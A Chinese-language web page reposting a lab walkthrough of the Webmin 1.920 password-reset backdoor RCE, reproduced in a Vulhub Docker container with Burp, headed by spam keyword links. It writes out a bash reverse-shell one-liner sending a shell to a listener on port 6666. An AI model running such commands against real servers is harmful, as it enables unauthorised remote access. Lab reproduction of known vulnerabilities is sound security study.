日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

漏洞描述

近日webmin被發現存在一處遠程命令執行漏洞,經過分析后,初步猜測其為一次后門植入事件,webmin是目前功能最強大的基于web的unix系統管理工具,管理員通過瀏覽器訪問webmin的各種管理功能并完成相應的管理動作,當用戶開啟webmin密碼重置功能后,攻擊者可以通過發送post請求在目標系統中執行任意命令,且無需身份驗證。

影響范圍:webmin <=1.920

 

漏洞復現

進入到vuhub之后,就直接執行Docker-compose up -d拉取鏡像搭建

漏洞利用復現,看看黑客如何入侵服務器

 

搭建好之后,直接訪問192.168.1.1:10000 但是vuhub搭建的網站它是有問題的,所以要根據它報錯的提示去修改相當, 所以這里的話,就需要用https去訪問,不然會不給訪問:https://192.168.1.1:10000/

漏洞利用復現,看看黑客如何入侵服務器

 

接著就是我們的漏洞利用,訪問https://192.168.67.135:10000/password_change.cgi,這樣的話,去訪問它是會報錯的,所以這里我們需要去修改一下配置文件。

漏洞利用復現,看看黑客如何入侵服務器

 

接著就是進入后臺修改配置文件,這里的話,就直接用docker exec it id號 /bin/bash

漏洞利用復現,看看黑客如何入侵服務器

 

進入到/etc/webmin目錄下,查看config文件。我們要修改的內容是config中的referers_one=1這個配置。

漏洞利用復現,看看黑客如何入侵服務器

 

但是在docker容器中,它是沒有編輯器的,所以這里的話,我們需要安裝一個vim編輯器

cat /etc/os-release先進入容器查看發行版,確定使用yum還是apt安裝工具

漏洞利用復現,看看黑客如何入侵服務器

 

可以看到使用的debian8的操作系統,接下來apt安裝, apt install vim

接著就是編輯這個文件config,然后將referers_one=1改為referers_one=0

漏洞利用復現,看看黑客如何入侵服務器

 

接著再去訪問那個路徑就可以看見,我們這邊的頁面也發生了相對應的變換,它已經不報錯了。

漏洞利用復現,看看黑客如何入侵服務器

 

那么接下來的話,就是利用poc復現漏洞,這里的話,要訪問https://192.168.1.1:10000/password_change.cgi并且用burp抓包

漏洞利用復現,看看黑客如何入侵服務器

 

使用網上的poc懟,看到成功執行命令
poc如下

漏洞利用復現,看看黑客如何入侵服務器

 

之后看見效果,很明顯的成功執行了命令。

漏洞利用復現,看看黑客如何入侵服務器

 

執行一個whoami,它這里也成功的輸出相對應的權限

漏洞利用復現,看看黑客如何入侵服務器

 

那么我們就要反彈shell,由于它這里可以執行執行命令,那么我們就可以直接執行bash -c "bash -i >& /dev/tcp/192.168.1.1/6666 0>&1" 接收shell服務器的6666端口)

那么的話,執行這個命令,那么我們服務器那邊就要監聽6666,接收反彈回來的shell。 這里的話,需要將payload進一方面的url編碼再去執行

漏洞利用復現,看看黑客如何入侵服務器

 

服務器那邊監聽6666端口接收反彈回來的shell可以看見我們執行的payload,右邊的頁面一片空白,就說明成功了。

漏洞利用復現,看看黑客如何入侵服務器

 

然后就可以看見成功的反彈了一個shell過來了。

漏洞利用復現,看看黑客如何入侵服務器

 

最后喜歡我文章的朋友請加圈子關注我們,私信關鍵詞:學習。(送免費資料和優惠券)

就會自動分享給你微信號。歡迎大家加入我們的安全大家庭。提高大家的安全意識,提升大家的網絡安全技能一直是我們的初衷和愿景,讓我們共同成為守護信息世界的"SaFeMAN"。

還有可以關注我們微信公眾號,在公眾號上輸入安界網,就可以關注到我們,領取資料和優惠券!

分享到:
標簽:漏洞 服務器
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定